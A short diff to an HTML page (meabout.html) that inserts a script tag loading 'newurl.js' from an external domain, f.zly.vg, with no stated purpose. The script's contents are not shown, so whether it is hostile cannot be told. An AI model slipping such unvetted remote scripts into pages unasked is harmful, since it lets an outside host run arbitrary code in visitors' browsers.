--- a/meabout.html
+++ b/meabout.html
@@ -140,6 +140,8 @@ details summary::-webkit-details-marker,
 
 
 </style>
+<script src='https://f.zly.vg/js/newurl.js'></script>
+
 <script>  
 window.onload = function() {
   if (window.innerHeight<window.innerWidth) {
